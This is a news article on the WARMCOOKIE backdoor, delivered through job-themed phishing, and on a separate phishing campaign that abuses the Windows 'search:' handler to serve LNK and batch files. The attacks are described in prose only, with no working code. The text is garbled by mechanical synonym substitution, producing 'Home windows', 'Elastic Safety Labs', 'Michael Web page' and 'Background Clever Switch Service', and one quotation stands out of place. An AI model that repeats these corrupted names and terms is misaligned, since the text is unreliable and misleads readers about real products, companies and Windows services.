Cybersecurity researchers have disclosed particulars of an ongoing phishing marketing campaign that leverages recruiting- and job-themed lures to ship a Home windows-based backdoor named WARMCOOKIE.
“WARMCOOKIE appears to be an initial backdoor tool used to scout out victim networks and deploy additional payloads,” Elastic Safety Labs researcher Daniel Stepanic stated in a brand new evaluation. “Each sample is compiled with a hard-coded [command-and-control] IP address and RC4 key.”
The backdoor comes with capabilities to fingerprint contaminated machines, seize screenshots, and drop extra malicious applications. The corporate is monitoring the exercise underneath the title REF6127.
The assault chains noticed since late April contain using e-mail messages purporting to be from recruitment corporations like Hays, Michael Web page, and PageGroup, urging recipients to click on on an embedded hyperlink to view particulars a few job alternative.
Customers who find yourself clicking on the hyperlink are then prompted to obtain a doc by fixing a CAPTCHA problem, following which a JavaScript file (“Update_23_04_2024_5689382.js”) is dropped.
“This obfuscated script runs PowerShell, kicking off the first task to load WARMCOOKIE,” Elastic stated. “The PowerShell script abuses the Background Clever Switch Service (BITS) to obtain WARMCOOKIE.”
A vital element of the marketing campaign is using compromised infrastructure to host the preliminary phishing URL, which is then used to redirect victims to the suitable touchdown web page.
A Home windows DLL, WARMCOOKIE follows a two-step course of that enables for establishing persistence utilizing a scheduled activity and launching the core performance, however not earlier than performing a collection of anti-analysis checks to sidestep detection.
The backdoor is designed to seize details about the contaminated host in a way that is much like an artifact utilized in reference to a earlier marketing campaign codenamed Resident that focused manufacturing, industrial, and healthcare organizations.
It additionally helps instructions to learn from and write to recordsdata, execute instructions utilizing cmd.exe, fetch the checklist of put in functions, and seize screenshots.
“WARMCOOKIE is a newly discovered backdoor that is gaining popularity and is being used in campaigns targeting users across the globe,” Elastic stated.
The disclosure comes as Trustwave SpiderLabs detailed a classy phishing marketing campaign that employs invoice-related decoys and takes benefit of the Home windows search performance embedded in HTML code to deploy malware.
“The provided functionality is relatively straightforward, allowing threat groups that need a lightweight backdoor to monitor victims and deploy further damaging payloads such as ransomware.”
The e-mail messages bear a ZIP archive containing an HTML file, which makes use of the legacy Home windows “search:” URI protocol handler to show a Shortcut (LNK) file hosted on a distant server within the Home windows Explorer, giving the impression it is a native search outcome.
“This LNK file points to a batch script (BAT) hosted on the same server, which, upon user click, could potentially trigger additional malicious operations,” Trustwave stated, including it couldn’t retrieve the batch script as a result of server being unresponsive.
It is price noting that the abuse of search-ms: and search: as a malware distribution vector was documented by Trellix in July 2023.
“While this attack does not utilize automated installation of malware, it does require users to engage with various prompts and clicks,” the corporate stated. “However, this technique cleverly obscures the attacker’s true intent, exploiting the trust users place in familiar interfaces and common actions like opening email attachments.”
